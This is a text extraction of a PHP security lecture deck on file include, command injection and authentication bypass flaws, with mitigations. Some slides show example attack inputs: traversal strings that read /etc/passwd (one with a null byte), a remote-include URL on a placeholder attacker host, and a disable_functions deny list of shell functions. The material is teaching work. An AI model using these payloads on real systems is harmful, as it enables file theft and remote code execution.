Code Inject File Vuln Auth Bypass

7/29/2019 Code Inject File Vuln Auth Bypass

1/44

Copyright Justin C. Klein Keane

PHP Vulnerability Potpourri

File Include, Command Injection & AuthenticationBypass Vulnerabilities


2/44


File Include Vulnerabilities

Arbitrary file includes (reading)

Local file includes

Remote file includes

Directory traversal

Writing arbitrary files


3/44


Basic PHP File Includes

Four common functions

include()

include_once()

require()

require_once()

Difference is that require will die (with fatal E_ERROR)if the specified file is not found

Include() will produce an E_WARNING

_once functions will not re-include the file if it hasalready been called


4/44


How Includes Work

When PHP includes a file it will parse any PHPcode within that file

Anything not delimited with the PHP delimiters() will be treated as plain text

Plain text will simply be rendered inline


5/44


Typical Include


6/44


Problems with Includes

Arbitrary local file includes triggered viamalicious user input:

If user supplies ../../../../../../../etc/passwd as

the 'action' URL variable that file will berendered during page display!


7/44


Incorrect Projection Schemes

Some programmers will append a file extensionto attempt to limit includes like /etc/passwd

This fails for several reasons, one is becausePHP is written in C


8/44


Caveats of C

C doesn't have a string type

Instead strings are null terminated character arrays:char foo[3];

int main() {foo[0] = 'B';foo[1] = 'A';foo[2] = 'R';foo[3] = '\0';

}

Without the null at the end the string would have no end

C reads from the start of the string until it reaches the nullcharacter when printing strings


9/44


Tricking PHP with C Conventions

Using a null character triggers C constructs anddefeats the prior example

If user passes in:action=../../../../../../etc/passwd%00

then PHP executes:include('inc/../.././../../etc/passwd');

Because PHP terminates the string at the nullbit (and ignores the appended '.php')

Most PHP programmers are unaware of this!


10/44


Other Include Strategies

There are other ways around extensionprotections

Attacker can provide the GET var:?action=/path/to/other/php_file.php?

renders the final .php as a GET var to theincluded php_file.php


11/44


Other Dangers of Includes

Often times include files are meant to beincluded, not directly referenced

Include files live on the filesystem May contain vulnerabilities when called directly

as variables could be redefined or arbitrarilydefined

Especially dangerous when register_globals ison!


12/44


Example

Main file:


13/44


Remote File Include

Rather than specifying a local resource, anattacker could specify a remote file for inclusion

Remote files must be served as plain text,rather than compiled PHP

Remote text is pulled for inclusion then the localPHP compiler interprets the text, rendering thePHP locally


14/44


Remote File IncludeRequirements

/etc/php.ini has parameters that define the abilityof PHP to include files:

;;;;;;;;;;;;;;;;;;; Fopen wrappers ;;;;;;;;;;;;;;;;;;;

; Whether to allow the treatment of URLs (like http:// or

ftp://) as files.

allow_url_fopen = On


15/44


If allow_url_fopen is On

Attackers can include remote files:

Attacker can call

?action=http://evilSite.tld/evil_script.txt?


16/44


Other Include Strategies

Attackers can use includes to bypass direct accessrestrictions such as .htaccess

This could be used to expose files like config.ini files

Attackers can include Apache files like .htpasswd or.htaccess files which are included as plain text, exposingtheir contents

Attackers can subvert program flow by calling files that are

normally not included

Attackers can call files readable by Apache, such as filesin /tmp which may contain sensitive data (like sessioncookies or malicious uploads)


17/44


Writing Files

PHP functionality used to write files include:

File upload functions built into an application

(such as image uploads) Utilizing PHP filesystem commands such as

fwrite()


18/44


Typical Image Upload Handler

$upload_dir = "files/";$filename = basename($_FILES['form_filename']['name']);

$target = $upload_dir . $filename;

if(move_uploaded_file($_FILES['form_filename']['tmp_name'], $target)) {echo $filename . " has been uploaded";

}else{

echo "Error uploading file!";}


19/44


Common Upload Errors

Collisions cause overwrites

File type is not checked

Programmer may assume only image files arebeing uploaded, but this isn't enforced

File type is checked inappropriately

Simply checking $_FILES['upload_file']['type'] is

insufficient since this is a browser providedparameter

Double extensions (and programmer only check thefirst one)


20/44


Exploits for File Uploads

Attacker uploads a PHP file which contains abackdoor or exposes other system files

Attacker uploads a .htaccess file overwritingApache rules

Attacker overwrites existing files to insert abackdoor


21/44


Fwrite()

The fwrite() function is a built in function thatallows Apache to write to file handles

Often used in installers to write config files Also commonly used for logging

For more information see:

http://us3.php.net/manual/en/function.fwrite.php


22/44

What is Command Injection

Also known as arbitrary code execution

Attacker injects malicious input that is then

passed to functions that execute shellcommands based on the input


23/44

Typical Example


24/44

Injection Strategies

Shell commands are delimited by a semi-colon,so multiple commands can be chained together

The pound or hash (#) symbol denotes thebeginning of a comment on the shell, any textfollowing it will be ignored

Strategies similar to SQL injection can be

utilized


25/44

Functions to Watch

Luckily, the list of commands which execute viaa shell is somewhat limited:

system() Executes the command and returns output

exec()

Executes command, can populate PHP

variables with output and return values passthru()

Executes command but only returns returnstatus


26/44

Other Dangerous Functions

There are other, less common functions towatch out for

Backtick operators $retval = `ls -lh *.php`;

shell_exec()

Same as backtick


27/44

Pipe Operations

PHP has commands that can open a pipe to aprocess, so input and output can be directed tothe process

popen() and pclose()

$proc = popen(/bin/ls, r);

proc_open()

Offers more command control


28/44

Command Sanitization

PHP has two commands that can be used toscrub input before passing it to a command

escapeshellarg() Adds quotes around string and escapes any

internal quotes

escapeshellcmd()

Escapes all special characters that could beused to interrupt or override execution flow

Note that you should still strive to sanitize toknown good commands


29/44

Other Nefarious Outliers

preg_replace with the /e flag allows forcommand execution

This is certainly not the first place you wouldlook to find command execution!


30/44

Executing PHP Commands

Using the eval() command

Because of PHP's dynamic nature, variables

can actually be interpreted as commands:


31/44

Mitigation

PHP's php.ini contains a rarely used directive:

; This directive allows you to disable certain functions for security reasons.

; It receives a comma-delimited list of function names. This directive is

; *NOT* affected by whether Safe Mode is turned On or Off.disable_functions = exec, system, passthru, eval

Won't completely cut off avenues of attack butcan limit the programmers power to introduce

vulnerabilities No way to limit backticks via php.ini


32/44


Auth Bypass

Authentication bypass is a vulnerability thatallows an attacker to gain access tofunctionality without providing valid credentials

Attackers may seek to steal an authenticatedusers session

May also be possible to initiate a privileged

session without credentials Some functionality may not need a session


33/44


Session Handling

PHP controls session data via a PHPSESSIDcookie by default (defined in php.ini)


34/44


Session Cookies

Difficult to predict/guess

However, stored on the filesystem

Location determined by settings in /etc/php.inisession.save_path = "/var/lib/php/session"

; Whether to use cookies.session.use_cookies = 1; This option enables administrators to make their users invulnerable to; attacks which involve passing session ids in URLs; defaults to 0.; session.use_only_cookies = 1; Name of the session (used as cookie name).session.name = PHPSESSID; Initialize session on request startup.session.auto_start = 0; Lifetime in seconds of cookie or, if 0, until browser is restarted.session.cookie_lifetime = 0; The path for which the cookie is valid.session.cookie_path = /; The domain for which the cookie is valid.session.cookie_domain =


35/44


Permissions on Session Dir

# ls -lah /var/lib/phptotal 156K

drwxr-xr-x 3 root root 4.0K Jun 2 12:13 .drwxr-xr-x 21 root root 4.0K Jun 2 12:42 ..drwxrwx--- 2 root apache 132K Jun 22 14:37 session

Note that apache can read and write in thisdirectory


36/44


phpinfo() Disclosure


37/44


Data Can be Leaked

If attacker can leverage webapp to list thecookie directory they can modify their owncookies

Cookie isn't tied to an IP, so cookie holderautomatically gains session access

Cookie can also be stolen from the end user

JavaScript can access cookies with domainrestrictions


38/44


Logical Flaws

Application fails to check credentials properly

Name collisions for instance

These will not be programming errors so aremuch more difficult to detect


39/44


Limited Authentication

Application may only check for authentication inone place

Some files may assume that authentication hastaken place but may be accessible outside ofthat flow


40/44


Brute Force

Steps should be taken to limit authenticationattempts

At the very least log auth attempts and alertsomeone on multiple failures

Be sure to limit login failure feedback (don'talert an attacker to whether or not a username

or password exists) Be wary of password recovery functionality and

information it might disclose to an attacker

L t F il


41/44


Logout Failure

Applications that don't properly end sessionscould leave them open for exploitation

Kiosks or other public terminals are primeoffenders in these circumstances

U t d A th ti ti


42/44


Unencrypted Authentication

Cookies and/or post data may be stolen

Forms themselves should be encrypted, not just

their post targets MITM plain text keystroke loggers could be

utilized on unencrypted login forms

I f ti Di l


43/44


Information Disclosure

There are many seemingly innocuous ways thatinformation valuable to an attacker can bedisclosed

Debugging messages

phpinfo() output can reveal configuration informaiton

Plain text files such as .ini or .htaccess or .htpasswdfiles could be exposed

Directory listing could show files that would otherwisebe difficult to find

HTML comments

E d I f ti


44/44


Exposed Information

Assume any web accessible file can be read byan attacker

Tools for brute force guessing filenames anddirectories exist

Look at include files to make sure they can't beabused by being called directly

Documents

Code Inject File Vuln Auth Bypass